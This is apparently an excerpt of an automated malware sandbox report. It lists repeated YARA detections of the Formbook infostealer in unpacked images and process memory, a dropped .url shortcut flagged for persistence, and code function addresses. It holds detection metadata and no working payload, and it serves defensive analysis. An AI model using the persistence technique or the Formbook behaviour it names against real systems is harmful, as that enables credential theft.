            Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: Process Memory Space: TR0627729920002.exe PID: 5932, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: cmd.exe PID: 564, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: Jwjxmakrv.exe PID: 2460, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: rundll32.exe PID: 4684, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: C:\Users\Public\Libraries\vrkamxjwJ.url, type: DROPPEDMatched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
            Source: C:\Users\Public\Libraries\vrkamxjwJ.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9DBD2
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0EBB0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA2B28
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA22AE
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF4120
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDF900
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA28EC
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BEB090
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C020A0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA20A8
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91002
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CAE824
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA1FF1
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA2EF7
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF6E30
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9D616
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA25DD
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C02581
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BED5E0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD0D20
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA1D55
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA2D07
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE841F
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9D466
            Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 03BDB150 appears 35 times
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19A50 NtCreateFile,LdrInitializeThunk,
